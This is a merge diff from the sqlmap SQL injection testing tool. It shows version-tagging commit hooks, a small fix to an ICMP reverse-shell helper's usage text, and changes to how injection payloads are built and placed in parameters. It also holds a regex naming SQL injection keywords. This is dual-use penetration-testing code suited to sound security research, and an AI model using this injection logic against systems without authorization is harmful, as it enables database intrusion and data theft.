Merge remote-tracking branch 'sqlmapproject/master'

doc/THIRD-PARTY.md

@@ -12,7 +12,7 @@ This file lists bundled packages and their associated licensing terms.
   Copyright (C) 2005, Zope Corporation.
   Copyright (C) 1998-2000, Gisle Aas.
 * The Colorama library located under thirdparty/colorama/.
-  Copyright (C) 2010, Jonathan Hartley.
+  Copyright (C) 2013, Jonathan Hartley.
 * The Fcrypt library located under thirdparty/fcrypt/.
   Copyright (C) 2000, 2001, 2004 Carey Evans.
 * The Odict library located under thirdparty/odict/.

extra/icmpsh/icmpsh-s.c

@@ -99,7 +99,7 @@ void usage(char *path)
 	printf("  -h                 this screen\n");
 	printf("  -b num             maximal number of blanks (unanswered icmp requests)\n");
     printf("                     before quitting\n");
-	printf("  -s bytes           maximal data buffer size in bytes (default is 64 bytes)\n\n", DEFAULT_MAX_DATA_SIZE);
+	printf("  -s bytes           maximal data buffer size in bytes (default is %u bytes)\n\n", DEFAULT_MAX_DATA_SIZE);
 	printf("In order to improve the speed, lower the delay (-d) between requests or\n");
     printf("increase the size (-s) of the data buffer\n");
 }
@@ -203,8 +203,6 @@ int main(int argc, char **argv)
 	PROCESS_INFORMATION pi;
 	int status;
 	unsigned int max_data_size;
-	struct hostent *he;
-
 
 	// set defaults
 	target = 0;

extra/shutils/postcommit-hook

@@ -0,0 +1,21 @@
+#!/bin/bash
+
+SETTINGS="../../lib/core/settings.py"
+
+declare -x SCRIPTPATH="${0}"
+
+FULLPATH=${SCRIPTPATH%/*}/$SETTINGS
+
+if [ -f $FULLPATH ]
+then
+    LINE=$(grep -o ${FULLPATH} -e 'VERSION = "[0-9.]*"');
+    declare -a LINE;
+    NEW_TAG=$(python -c "import re, sys, time; version = re.search('\"([0-9.]*)\"', sys.argv[1]).group(1); _ = version.split('.'); print '.'.join(_[:-1]) if len(_) == 4 and _[-1] == '0' else ''" "$LINE")
+    if [ -n "$NEW_TAG" ]
+    then
+        git commit -am "Automatic monthly tagging"
+        echo "Creating new tag ${NEW_TAG}";
+        git tag $NEW_TAG;
+        git push origin $NEW_TAG
+    fi
+fi;

extra/shutils/precommit-hook

@@ -10,7 +10,7 @@ if [ -f $FULLPATH ]
 then
     LINE=$(grep -o ${FULLPATH} -e 'VERSION = "[0-9.]*"');
     declare -a LINE;
-    INCREMENTED=$(python -c "import re, sys; version = re.search('\"([0-9.]*)\"', sys.argv[1]).group(1); _ = version.split('.'); _.append(0) if len(_) < 3 else _; _[-1] = str(int(_[-1]) + 1); print sys.argv[1].replace(version, '.'.join(_))" "$LINE")
+    INCREMENTED=$(python -c "import re, sys, time; version = re.search('\"([0-9.]*)\"', sys.argv[1]).group(1); _ = version.split('.'); _.append(0) if len(_) < 3 else _; _[-1] = str(int(_[-1]) + 1); month = str(time.gmtime().tm_mon); _[-1] = '0' if _[-2] != month else _[-1]; _[-2] = month; print sys.argv[1].replace(version, '.'.join(_))" "$LINE")
     if [ -n "$INCREMENTED" ]
     then
         sed "s/${LINE}/${INCREMENTED}/" $FULLPATH > $FULLPATH.tmp && mv $FULLPATH.tmp $FULLPATH

lib/controller/checks.py

@@ -7,6 +7,7 @@ See the file 'doc/COPYING' for copying permission
 
 import copy
 import httplib
+import random
 import re
 import socket
 import time
@@ -62,7 +63,6 @@ from lib.core.exception import SqlmapConnectionException
 from lib.core.exception import SqlmapNoneDataException
 from lib.core.exception import SqlmapSilentQuitException
 from lib.core.exception import SqlmapUserQuitException
-from lib.core.settings import CLOUDFLARE_SERVER_HEADER
 from lib.core.settings import DEFAULT_GET_POST_DELIMITER
 from lib.core.settings import DUMMY_NON_SQLI_CHECK_APPENDIX
 from lib.core.settings import FORMAT_EXCEPTION_STRINGS
@@ -906,7 +906,7 @@ def heuristicCheckSqlInjection(place, parameter):
 
         if not result:
             randStr = randomStr()
-            payload = "%s%s%s" % (prefix, "%s%s" % (origValue, randStr), suffix)
+            payload = "%s%s%s" % (prefix, "%s.%d%s" % (origValue, random.randint(1, 9), randStr), suffix)
             payload = agent.payload(place, parameter, newValue=payload, where=PAYLOAD.WHERE.REPLACE)
             casting = Request.queryPage(payload, place, raise404=False)
 
@@ -1383,10 +1383,6 @@ def checkConnection(suppressOutput=False):
         else:
             kb.errorIsNone = True
 
-        if headers and headers.get("Server", "") == CLOUDFLARE_SERVER_HEADER:
-            warnMsg = "CloudFlare response detected"
-            logger.warn(warnMsg)
-
     except SqlmapConnectionException, ex:
         if conf.ipv6:
             warnMsg = "check connection to a provided "

lib/controller/controller.py

@@ -209,9 +209,8 @@ def _saveToHashDB():
             _[key].data.update(injection.data)
     hashDBWrite(HASHDB_KEYS.KB_INJECTIONS, _.values(), True)
 
-    _ = hashDBRetrieve(HASHDB_KEYS.KB_ABS_FILE_PATHS, True) or set()
+    _ = hashDBRetrieve(HASHDB_KEYS.KB_ABS_FILE_PATHS, True)
-    _.update(kb.absFilePaths)
+    hashDBWrite(HASHDB_KEYS.KB_ABS_FILE_PATHS, kb.absFilePaths | (_ if isinstance(_, set) else set()), True)
-    hashDBWrite(HASHDB_KEYS.KB_ABS_FILE_PATHS, _, True)
 
     if not hashDBRetrieve(HASHDB_KEYS.KB_CHARS):
         hashDBWrite(HASHDB_KEYS.KB_CHARS, kb.chars, True)
@@ -464,7 +463,7 @@ def start():
                             infoMsg = "skipping randomizing %s parameter '%s'" % (paramType, parameter)
                             logger.info(infoMsg)
 
-                        elif parameter in conf.skip:
+                        elif parameter in conf.skip or kb.postHint and parameter.split(' ')[-1] in conf.skip:
                             testSqlInj = False
 
                             infoMsg = "skipping %s parameter '%s'" % (paramType, parameter)
@@ -522,7 +521,7 @@ def start():
                                 injection = checkSqlInjection(place, parameter, value)
                                 proceed = not kb.endDetection
 
-                                if injection is not None and injection.place is not None:
+                                if getattr(injection, "place", None) is not None:
                                     kb.injections.append(injection)
 
                                     # In case when user wants to end detection phase (Ctrl+C)

lib/core/agent.py

@@ -17,6 +17,7 @@ from lib.core.common import isTechniqueAvailable
 from lib.core.common import randomInt
 from lib.core.common import randomStr
 from lib.core.common import safeSQLIdentificatorNaming
+from lib.core.common import safeStringFormat
 from lib.core.common import singleTimeWarnMessage
 from lib.core.common import splitFields
 from lib.core.common import unArrayizeValue
@@ -34,10 +35,12 @@ from lib.core.enums import PLACE
 from lib.core.enums import POST_HINT
 from lib.core.exception import SqlmapNoneDataException
 from lib.core.settings import BOUNDARY_BACKSLASH_MARKER
+from lib.core.settings import BOUNDED_INJECTION_MARKER
 from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR
 from lib.core.settings import DEFAULT_COOKIE_DELIMITER
 from lib.core.settings import DEFAULT_GET_POST_DELIMITER
 from lib.core.settings import GENERIC_SQL_COMMENT
+from lib.core.settings import NULL
 from lib.core.settings import PAYLOAD_DELIMITER
 from lib.core.settings import REPLACEMENT_MARKER
 from lib.core.unescaper import unescaper
@@ -94,9 +97,12 @@ class Agent(object):
         paramDict = conf.paramDict[place]
         origValue = getUnicode(paramDict[parameter])
 
-        if place == PLACE.URI:
+        if place == PLACE.URI or BOUNDED_INJECTION_MARKER in origValue:
             paramString = origValue
-            origValue = origValue.split(CUSTOM_INJECTION_MARK_CHAR)[0]
+            if place == PLACE.URI:
+                origValue = origValue.split(CUSTOM_INJECTION_MARK_CHAR)[0]
+            else:
+                origValue = re.search(r"\w+\Z", origValue.split(BOUNDED_INJECTION_MARKER)[0]).group(0)
             origValue = origValue[origValue.rfind('/') + 1:]
             for char in ('?', '=', ':'):
                 if char in origValue:
@@ -160,6 +166,9 @@ class Agent(object):
             newValue = newValue.replace(CUSTOM_INJECTION_MARK_CHAR, REPLACEMENT_MARKER)
             retVal = paramString.replace(_, self.addPayloadDelimiters(newValue))
             retVal = retVal.replace(CUSTOM_INJECTION_MARK_CHAR, "").replace(REPLACEMENT_MARKER, CUSTOM_INJECTION_MARK_CHAR)
+        elif BOUNDED_INJECTION_MARKER in paramDict[parameter]:
+            _ = "%s%s" % (origValue, BOUNDED_INJECTION_MARKER)
+            retVal = "%s=%s" % (parameter, paramString.replace(_, self.addPayloadDelimiters(newValue)))
         elif place in (PLACE.USER_AGENT, PLACE.REFERER, PLACE.HOST):
             retVal = paramString.replace(origValue, self.addPayloadDelimiters(newValue))
         else:
@@ -272,7 +281,7 @@ class Agent(object):
             where = kb.injection.data[kb.technique].where if where is None else where
             comment = kb.injection.data[kb.technique].comment if comment is None else comment
 
-        if Backend.getIdentifiedDbms() == DBMS.ACCESS and comment == GENERIC_SQL_COMMENT:
+        if Backend.getIdentifiedDbms() == DBMS.ACCESS and "--" in (comment or ""):
             comment = queries[DBMS.ACCESS].comment.query
 
         if comment is not None:
@@ -295,7 +304,7 @@ class Agent(object):
         _ = (
                 ("[DELIMITER_START]", kb.chars.start), ("[DELIMITER_STOP]", kb.chars.stop),\
                 ("[AT_REPLACE]", kb.chars.at), ("[SPACE_REPLACE]", kb.chars.space), ("[DOLLAR_REPLACE]", kb.chars.dollar),\
-                ("[HASH_REPLACE]", kb.chars.hash_),
+                ("[HASH_REPLACE]", kb.chars.hash_), ("[GENERIC_SQL_COMMENT]", GENERIC_SQL_COMMENT)
             )
         payload = reduce(lambda x, y: x.replace(y[0], y[1]), _, payload)
 
@@ -746,6 +755,9 @@ class Agent(object):
             intoRegExp = intoRegExp.group(1)
             query = query[:query.index(intoRegExp)]
 
+            position = 0
+            char = NULL
+
         for element in xrange(0, count):
             if element > 0:
                 unionQuery += ','
@@ -923,7 +935,7 @@ class Agent(object):
             else:
                 limitedQuery = "%s FROM (SELECT %s,%s" % (untilFrom, ','.join(f for f in field), limitStr)
 
-            limitedQuery = limitedQuery % fromFrom
+            limitedQuery = safeStringFormat(limitedQuery, (fromFrom,))
             limitedQuery += "=%d" % (num + 1)
 
         elif Backend.isDbms(DBMS.MSSQL):

lib/core/common.py

@@ -91,6 +91,7 @@ from lib.core.log import LOGGER_HANDLER
 from lib.core.optiondict import optDict
 from lib.core.settings import BANNER
 from lib.core.settings import BOLD_PATTERNS
+from lib.core.settings import BOUNDED_INJECTION_MARKER
 from lib.core.settings import BRUTE_DOC_ROOT_PREFIXES
 from lib.core.settings import BRUTE_DOC_ROOT_SUFFIXES
 from lib.core.settings import BRUTE_DOC_ROOT_TARGET_MARK
@@ -128,6 +129,7 @@ from lib.core.settings import PARTIAL_VALUE_MARKER
 from lib.core.settings import PAYLOAD_DELIMITER
 from lib.core.settings import PLATFORM
 from lib.core.settings import PRINTABLE_CHAR_REGEX
+from lib.core.settings import PUSH_VALUE_EXCEPTION_RETRY_COUNT
 from lib.core.settings import PYVERSION
 from lib.core.settings import REFERER_ALIASES
 from lib.core.settings import REFLECTED_BORDER_REGEX
@@ -150,6 +152,7 @@ from lib.core.threads import getCurrentThreadData
 from lib.utils.sqlalchemy import _sqlalchemy
 from thirdparty.clientform.clientform import ParseResponse
 from thirdparty.clientform.clientform import ParseError
+from thirdparty.colorama.initialise import init as coloramainit
 from thirdparty.magic import magic
 from thirdparty.odict.odict import OrderedDict
 from thirdparty.termcolor.termcolor import colored
@@ -597,6 +600,17 @@ def paramToDict(place, parameters=None):
                         warnMsg += "so sqlmap could be able to run properly"
                         logger.warn(warnMsg)
 
+                if place in (PLACE.POST, PLACE.GET):
+                    regex = r"\A([^\w]+.*\w+)([^\w]+)\Z"
+                    match = re.search(regex, testableParameters[parameter])
+                    if match:
+                        _ = re.sub(regex, "\g<1>%s\g<2>" % CUSTOM_INJECTION_MARK_CHAR, testableParameters[parameter])
+                        message = "it appears that provided value for %s parameter '%s' " % (place, parameter)
+                        message += "has boundaries. Do you want to inject inside? ('%s') [y/N] " % _
+                        test = readInput(message, default="N")
+                        if test[0] in ("y", "Y"):
+                            testableParameters[parameter] = re.sub(regex, "\g<1>%s\g<2>" % BOUNDED_INJECTION_MARKER, testableParameters[parameter])
+
     if conf.testParameter and not testableParameters:
         paramStr = ", ".join(test for test in conf.testParameter)
 
@@ -967,7 +981,12 @@ def randomRange(start=0, stop=1000, seed=None):
     423
     """
 
-    randint = random.WichmannHill(seed).randint if seed is not None else random.randint
+    if seed is not None:
+        _ = getCurrentThreadData().random
+        _.seed(seed)
+        randint = _.randint
+    else:
+        randint = random.randint
 
     return int(randint(start, stop))
 
@@ -980,7 +999,12 @@ def randomInt(length=4, seed=None):
     874254
     """
 
-    choice = random.WichmannHill(seed).choice if seed is not None else random.choice
+    if seed is not None:
+        _ = getCurrentThreadData().random
+        _.seed(seed)
+        choice = _.choice
+    else:
+        choice = random.choice
 
     return int("".join(choice(string.digits if _ != 0 else string.digits.replace('0', '')) for _ in xrange(0, length)))
 
@@ -993,7 +1017,12 @@ def randomStr(length=4, lowercase=False, alphabet=None, seed=None):
     'RNvnAv'
     """
 
-    choice = random.WichmannHill(seed).choice if seed is not None else random.choice
+    if seed is not None:
+        _ = getCurrentThreadData().random
+        _.seed(seed)
+        choice = _.choice
+    else:
+        choice = random.choice
 
     if alphabet:
         retVal = "".join(choice(alphabet) for _ in xrange(0, length))
@@ -1022,14 +1051,17 @@ def getHeader(headers, key):
             break
     return retVal
 
-def checkFile(filename):
+def checkFile(filename, raiseOnError=True):
     """
     Checks for file existence and readability
     """
 
     valid = True
 
-    if filename is None or not os.path.isfile(filename):
+    try:
+        if filename is None or not os.path.isfile(filename):
+            valid = False
+    except UnicodeError:
         valid = False
 
     if valid:
@@ -1039,18 +1071,25 @@ def checkFile(filename):
         except:
             valid = False
 
-    if not valid:
+    if not valid and raiseOnError:
         raise SqlmapSystemException("unable to read file '%s'" % filename)
 
+    return valid
+
 def banner():
     """
     This function prints sqlmap banner with its version
     """
 
-    _ = BANNER
+    if not any(_ in sys.argv for _ in ("--version", "--pickled-options")):
-    if not getattr(LOGGER_HANDLER, "is_tty", False):
+        _ = BANNER
-        _ = re.sub("\033.+?m", "", _)
+
-    dataToStdout(_, forceOutput=True)
+        if not getattr(LOGGER_HANDLER, "is_tty", False) or "--disable-coloring" in sys.argv:
+            _ = re.sub("\033.+?m", "", _)
+        elif IS_WIN:
+            coloramainit()
+
+        dataToStdout(_, forceOutput=True)
 
 def parsePasswordHash(password):
     """
@@ -2183,7 +2222,22 @@ def pushValue(value):
     Push value to the stack (thread dependent)
     """
 
-    getCurrentThreadData().valueStack.append(copy.deepcopy(value))
+    _ = None
+    success = False
+
+    for i in xrange(PUSH_VALUE_EXCEPTION_RETRY_COUNT):
+        try:
+            getCurrentThreadData().valueStack.append(copy.deepcopy(value))
+            success = True
+            break
+        except Exception, ex:
+            _ = ex
+
+    if not success:
+        getCurrentThreadData().valueStack.append(None)
+
+        if _:
+            raise _
 
 def popValue():
     """
@@ -2917,7 +2971,7 @@ def showHttpErrorCodes():
             msg += "could mean that some kind of protection is involved (e.g. WAF)"
             logger.debug(msg)
 
-def openFile(filename, mode='r', encoding=UNICODE_ENCODING, errors="replace", buffering=1):
+def openFile(filename, mode='r', encoding=UNICODE_ENCODING, errors="replace", buffering=1):  # "buffering=1" means line buffered (Reference: http://stackoverflow.com/a/3168436)
     """
     Returns file handle of a given filename
     """
@@ -3126,14 +3180,6 @@ def intersect(valueA, valueB, lowerCase=False):
 
     return retVal
 
-def cpuThrottle(value):
-    """
-    Does a CPU throttling for lesser CPU consumption
-    """
-
-    delay = 0.00001 * (value ** 2)
-    time.sleep(delay)
-
 def removeReflectiveValues(content, payload, suppressWarning=False):
     """
     Neutralizes reflective values in a given content based on a payload
@@ -3142,59 +3188,65 @@ def removeReflectiveValues(content, payload, suppressWarning=False):
 
     retVal = content
 
-    if all([content, payload]) and isinstance(content, unicode) and kb.reflectiveMechanism and not kb.heuristicMode:
+    try:
-        def _(value):
+        if all([content, payload]) and isinstance(content, unicode) and kb.reflectiveMechanism and not kb.heuristicMode:
-            while 2 * REFLECTED_REPLACEMENT_REGEX in value:
+            def _(value):
-                value = value.replace(2 * REFLECTED_REPLACEMENT_REGEX, REFLECTED_REPLACEMENT_REGEX)
+                while 2 * REFLECTED_REPLACEMENT_REGEX in value:
-            return value
+                    value = value.replace(2 * REFLECTED_REPLACEMENT_REGEX, REFLECTED_REPLACEMENT_REGEX)
+                return value
 
-        payload = getUnicode(urldecode(payload.replace(PAYLOAD_DELIMITER, ''), convall=True))
+            payload = getUnicode(urldecode(payload.replace(PAYLOAD_DELIMITER, ''), convall=True))
-        regex = _(filterStringValue(payload, r"[A-Za-z0-9]", REFLECTED_REPLACEMENT_REGEX.encode("string-escape")))
+            regex = _(filterStringValue(payload, r"[A-Za-z0-9]", REFLECTED_REPLACEMENT_REGEX.encode("string-escape")))
 
-        if regex != payload:
+            if regex != payload:
-            if all(part.lower() in content.lower() for part in filter(None, regex.split(REFLECTED_REPLACEMENT_REGEX))[1:]):  # fast optimization check
+                if all(part.lower() in content.lower() for part in filter(None, regex.split(REFLECTED_REPLACEMENT_REGEX))[1:]):  # fast optimization check
-                parts = regex.split(REFLECTED_REPLACEMENT_REGEX)
+                    parts = regex.split(REFLECTED_REPLACEMENT_REGEX)
-                retVal = content.replace(payload, REFLECTED_VALUE_MARKER)  # dummy approach
+                    retVal = content.replace(payload, REFLECTED_VALUE_MARKER)  # dummy approach
 
-                if len(parts) > REFLECTED_MAX_REGEX_PARTS:  # preventing CPU hogs
+                    if len(parts) > REFLECTED_MAX_REGEX_PARTS:  # preventing CPU hogs
-                    regex = _("%s%s%s" % (REFLECTED_REPLACEMENT_REGEX.join(parts[:REFLECTED_MAX_REGEX_PARTS / 2]), REFLECTED_REPLACEMENT_REGEX, REFLECTED_REPLACEMENT_REGEX.join(parts[-REFLECTED_MAX_REGEX_PARTS / 2:])))
+                        regex = _("%s%s%s" % (REFLECTED_REPLACEMENT_REGEX.join(parts[:REFLECTED_MAX_REGEX_PARTS / 2]), REFLECTED_REPLACEMENT_REGEX, REFLECTED_REPLACEMENT_REGEX.join(parts[-REFLECTED_MAX_REGEX_PARTS / 2:])))
 
-                parts = filter(None, regex.split(REFLECTED_REPLACEMENT_REGEX))
+                    parts = filter(None, regex.split(REFLECTED_REPLACEMENT_REGEX))
 
-                if regex.startswith(REFLECTED_REPLACEMENT_REGEX):
+                    if regex.startswith(REFLECTED_REPLACEMENT_REGEX):
-                    regex = r"%s%s" % (REFLECTED_BORDER_REGEX, regex[len(REFLECTED_REPLACEMENT_REGEX):])
+                        regex = r"%s%s" % (REFLECTED_BORDER_REGEX, regex[len(REFLECTED_REPLACEMENT_REGEX):])
-                else:
+                    else:
-                    regex = r"\b%s" % regex
+                        regex = r"\b%s" % regex
 
-                if regex.endswith(REFLECTED_REPLACEMENT_REGEX):
+                    if regex.endswith(REFLECTED_REPLACEMENT_REGEX):
-                    regex = r"%s%s" % (regex[:-len(REFLECTED_REPLACEMENT_REGEX)], REFLECTED_BORDER_REGEX)
+                        regex = r"%s%s" % (regex[:-len(REFLECTED_REPLACEMENT_REGEX)], REFLECTED_BORDER_REGEX)
-                else:
+                    else:
-                    regex = r"%s\b" % regex
+                        regex = r"%s\b" % regex
 
-                retVal = re.sub(r"(?i)%s" % regex, REFLECTED_VALUE_MARKER, retVal)
+                    retVal = re.sub(r"(?i)%s" % regex, REFLECTED_VALUE_MARKER, retVal)
 
-                if len(parts) > 2:
+                    if len(parts) > 2:
-                    regex = REFLECTED_REPLACEMENT_REGEX.join(parts[1:])
+                        regex = REFLECTED_REPLACEMENT_REGEX.join(parts[1:])
-                    retVal = re.sub(r"(?i)\b%s\b" % regex, REFLECTED_VALUE_MARKER, retVal)
+                        retVal = re.sub(r"(?i)\b%s\b" % regex, REFLECTED_VALUE_MARKER, retVal)
 
-            if retVal != content:
+                if retVal != content:
-                kb.reflectiveCounters[REFLECTIVE_COUNTER.HIT] += 1
+                    kb.reflectiveCounters[REFLECTIVE_COUNTER.HIT] += 1
-                if not suppressWarning:
-                    warnMsg = "reflective value(s) found and filtering out"
-                    singleTimeWarnMessage(warnMsg)
-
-                if re.search(r"FRAME[^>]+src=[^>]*%s" % REFLECTED_VALUE_MARKER, retVal, re.I):
-                    warnMsg = "frames detected containing attacked parameter values. Please be sure to "
-                    warnMsg += "test those separately in case that attack on this page fails"
-                    singleTimeWarnMessage(warnMsg)
-
-            elif not kb.testMode and not kb.reflectiveCounters[REFLECTIVE_COUNTER.HIT]:
-                kb.reflectiveCounters[REFLECTIVE_COUNTER.MISS] += 1
-                if kb.reflectiveCounters[REFLECTIVE_COUNTER.MISS] > REFLECTIVE_MISS_THRESHOLD:
-                    kb.reflectiveMechanism = False
                     if not suppressWarning:
-                        debugMsg = "turning off reflection removal mechanism (for optimization purposes)"
+                        warnMsg = "reflective value(s) found and filtering out"
-                        logger.debug(debugMsg)
+                        singleTimeWarnMessage(warnMsg)
+
+                    if re.search(r"FRAME[^>]+src=[^>]*%s" % REFLECTED_VALUE_MARKER, retVal, re.I):
+                        warnMsg = "frames detected containing attacked parameter values. Please be sure to "
+                        warnMsg += "test those separately in case that attack on this page fails"
+                        singleTimeWarnMessage(warnMsg)
+
+                elif not kb.testMode and not kb.reflectiveCounters[REFLECTIVE_COUNTER.HIT]:
+                    kb.reflectiveCounters[REFLECTIVE_COUNTER.MISS] += 1
+                    if kb.reflectiveCounters[REFLECTIVE_COUNTER.MISS] > REFLECTIVE_MISS_THRESHOLD:
+                        kb.reflectiveMechanism = False
+                        if not suppressWarning:
+                            debugMsg = "turning off reflection removal mechanism (for optimization purposes)"
+                            logger.debug(debugMsg)
+    except MemoryError:
+        kb.reflectiveMechanism = False
+        if not suppressWarning:
+            debugMsg = "turning off reflection removal mechanism (because of low memory issues)"
+            logger.debug(debugMsg)
 
     return retVal
 

lib/core/convert.py

@@ -11,7 +11,6 @@ import pickle
 import re
 import StringIO
 import sys
-import types
 
 from lib.core.settings import IS_WIN
 from lib.core.settings import UNICODE_ENCODING

lib/core/defaults.py

@@ -11,7 +11,6 @@ _defaults = {
    "csvDel":       ",",
    "timeSec":      5,
    "googlePage":   1,
-   "cpuThrottle":  5,
    "verbose":      1,
    "delay":        0,
    "timeout":      30,

lib/core/dump.py

@@ -13,6 +13,7 @@ import tempfile
 import threading
 
 from lib.core.common import Backend
+from lib.core.common import checkFile
 from lib.core.common import dataToDumpFile
 from lib.core.common import dataToStdout
 from lib.core.common import getSafeExString
@@ -37,6 +38,7 @@ from lib.core.exception import SqlmapGenericException
 from lib.core.exception import SqlmapValueException
 from lib.core.exception import SqlmapSystemException
 from lib.core.replication import Replication
+from lib.core.settings import DUMP_FILE_BUFFER_SIZE
 from lib.core.settings import HTML_DUMP_CSS_STYLE
 from lib.core.settings import IS_WIN
 from lib.core.settings import METADB_SUFFIX
@@ -433,7 +435,7 @@ class Dump(object):
                             dumpDbPath = tempDir
 
             dumpFileName = os.path.join(dumpDbPath, "%s.%s" % (unsafeSQLIdentificatorNaming(table), conf.dumpFormat.lower()))
-            if not os.path.isfile(dumpFileName):
+            if not checkFile(dumpFileName, False):
                 try:
                     openFile(dumpFileName, "w+b").close()
                 except SqlmapSystemException:
@@ -448,8 +450,8 @@ class Dump(object):
                     else:
                         dumpFileName = os.path.join(dumpDbPath, "%s.%s" % (_, conf.dumpFormat.lower()))
 
-            appendToFile = os.path.isfile(dumpFileName) and any((conf.limitStart, conf.limitStop))
+            appendToFile = any((conf.limitStart, conf.limitStop)) and checkFile(dumpFileName, False)
-            dumpFP = openFile(dumpFileName, "wb" if not appendToFile else "ab")
+            dumpFP = openFile(dumpFileName, "wb" if not appendToFile else "ab", buffering=DUMP_FILE_BUFFER_SIZE)
 
         count = int(tableValues["__infos__"]["count"])
         separator = str()

lib/core/option.py

@@ -151,7 +151,6 @@ from lib.utils.crawler import crawl
 from lib.utils.deps import checkDependencies
 from lib.utils.search import search
 from lib.utils.purge import purge
-from thirdparty.colorama.initialise import init as coloramainit
 from thirdparty.keepalive import keepalive
 from thirdparty.oset.pyoset import oset
 from thirdparty.socks import socks
@@ -1654,10 +1653,20 @@ def _cleanupOptions():
         conf.testFilter = conf.testFilter.strip('*+')
         conf.testFilter = re.sub(r"([^.])([*+])", "\g<1>.\g<2>", conf.testFilter)
 
+        try:
+            re.compile(conf.testFilter)
+        except re.error:
+            conf.testFilter = re.escape(conf.testFilter)
+
     if conf.testSkip:
         conf.testSkip = conf.testSkip.strip('*+')
         conf.testSkip = re.sub(r"([^.])([*+])", "\g<1>.\g<2>", conf.testSkip)
 
+        try:
+            re.compile(conf.testSkip)
+        except re.error:
+            conf.testSkip = re.escape(conf.testSkip)
+
     if "timeSec" not in kb.explicitSettings:
         if conf.tor:
             conf.timeSec = 2 * conf.timeSec
@@ -1821,6 +1830,7 @@ def _setKnowledgeBaseAttributes(flushAll=True):
     kb.dnsTest = None
     kb.docRoot = None
     kb.dumpTable = None
+    kb.dumpKeyboardInterrupt = False
     kb.dynamicMarkings = []
     kb.dynamicParameter = False
     kb.endDetection = False
@@ -2330,10 +2340,6 @@ def _basicOptionValidation():
         errMsg = "value for option '--first' (firstChar) must be smaller than or equal to value for --last (lastChar) option"
         raise SqlmapSyntaxException(errMsg)
 
-    if isinstance(conf.cpuThrottle, int) and (conf.cpuThrottle > 100 or conf.cpuThrottle < 0):
-        errMsg = "value for option '--cpu-throttle' (cpuThrottle) must be in range [0,100]"
-        raise SqlmapSyntaxException(errMsg)
-
     if conf.textOnly and conf.nullConnection:
         errMsg = "switch '--text-only' is incompatible with switch '--null-connection'"
         raise SqlmapSyntaxException(errMsg)
@@ -2535,9 +2541,6 @@ def _resolveCrossReferences():
     lib.controller.checks.setVerbosity = setVerbosity
 
 def initOptions(inputOptions=AttribDict(), overrideOptions=False):
-    if IS_WIN:
-        coloramainit()
-
     _setConfAttributes()
     _setKnowledgeBaseAttributes()
     _mergeOptions(inputOptions, overrideOptions)

lib/core/optiondict.py

@@ -136,6 +136,7 @@ optDict = {
                                "tbl":               "string",
                                "col":               "string",
                                "excludeCol":        "string",
+                               "pivotColumn":       "string",
                                "dumpWhere":         "string",
                                "user":              "string",
                                "excludeSysDbs":     "boolean",
@@ -189,6 +190,7 @@ optDict = {
                                #"xmlFile":           "string",
                                "trafficFile":       "string",
                                "batch":             "boolean",
+                               "binaryFields":      "string",
                                "charset":           "string",
                                "crawlDepth":        "integer",
                                "crawlExclude":      "string",
@@ -201,7 +203,6 @@ optDict = {
                                "hexConvert":        "boolean",
                                "outputDir":         "string",
                                "parseErrors":       "boolean",
-                               "pivotColumn":       "string",
                                "saveConfig":        "string",
                                "scope":             "string",
                                "testFilter":        "string",
@@ -228,9 +229,7 @@ optDict = {
             "Hidden": {
                                "dummy":             "boolean",
                                "disablePrecon":     "boolean",
-                               "binaryFields":      "string",
                                "profile":           "boolean",
-                               "cpuThrottle":       "integer",
                                "forceDns":          "boolean",
                                "identifyWaf":       "boolean",
                                "skipWaf":           "boolean",

lib/core/session.py

@@ -26,7 +26,7 @@ def setDbms(dbms):
     hashDBWrite(HASHDB_KEYS.DBMS, dbms)
 
     _ = "(%s)" % ("|".join([alias for alias in SUPPORTED_DBMS]))
-    _ = re.search("^%s" % _, dbms, re.I)
+    _ = re.search(r"\A%s( |\Z)" % _, dbms, re.I)
 
     if _:
         dbms = _.group(1)

lib/core/settings.py

@@ -10,7 +10,6 @@ import re
 import subprocess
 import string
 import sys
-import time
 import types
 
 from lib.core.datatype import AttribDict
@@ -19,8 +18,8 @@ from lib.core.enums import DBMS_DIRECTORY_NAME
 from lib.core.enums import OS
 from lib.core.revision import getRevisionNumber
 
-# sqlmap version and site
+# sqlmap version (<major>.<minor>.<month>.<monthly commit>)
-VERSION = "1.0.0.8"
+VERSION = "1.0.5.11"
 REVISION = getRevisionNumber()
 STABLE = VERSION.count('.') <= 2
 VERSION_STRING = "sqlmap/%s#%s" % (VERSION, "stable" if STABLE else "dev")
@@ -61,6 +60,7 @@ PARTIAL_HEX_VALUE_MARKER = "__PARTIAL_HEX_VALUE__"
 URI_QUESTION_MARKER = "__QUESTION_MARK__"
 ASTERISK_MARKER = "__ASTERISK_MARK__"
 REPLACEMENT_MARKER = "__REPLACEMENT_MARK__"
+BOUNDED_INJECTION_MARKER = "__BOUNDED_INJECTION_MARK__"
 
 RANDOM_INTEGER_MARKER = "[RANDINT]"
 RANDOM_STRING_MARKER = "[RANDSTR]"
@@ -139,6 +139,9 @@ MAX_BUFFERED_PARTIAL_UNION_LENGTH = 1024
 # Suffix used for naming meta databases in DBMS(es) without explicit database name
 METADB_SUFFIX = "_masterdb"
 
+# Number of times to retry the pushValue during the exceptions (e.g. KeyboardInterrupt)
+PUSH_VALUE_EXCEPTION_RETRY_COUNT = 3
+
 # Minimum time response set needed for time-comparison based on standard deviation
 MIN_TIME_RESPONSES = 30
 
@@ -310,9 +313,6 @@ BURP_REQUEST_REGEX = r"={10,}\s+[^=]+={10,}\s(.+?)\s={10,}"
 # Regex used for parsing XML Burp saved history items
 BURP_XML_HISTORY_REGEX = r'<port>(\d+)</port>.+?<request base64="true"><!\[CDATA\[([^]]+)'
 
-# Server header in CloudFlare responses
-CLOUDFLARE_SERVER_HEADER = "cloudflare-nginx"
-
 # Encoding used for Unicode data
 UNICODE_ENCODING = "utf8"
 
@@ -445,7 +445,7 @@ DUMMY_SQL_INJECTION_CHARS = ";()'"
 DUMMY_USER_INJECTION = r"(?i)[^\w](AND|OR)\s+[^\s]+[=><]|\bUNION\b.+\bSELECT\b|\bSELECT\b.+\bFROM\b|\b(CONCAT|information_schema|SLEEP|DELAY)\b"
 
 # Extensions skipped by crawler
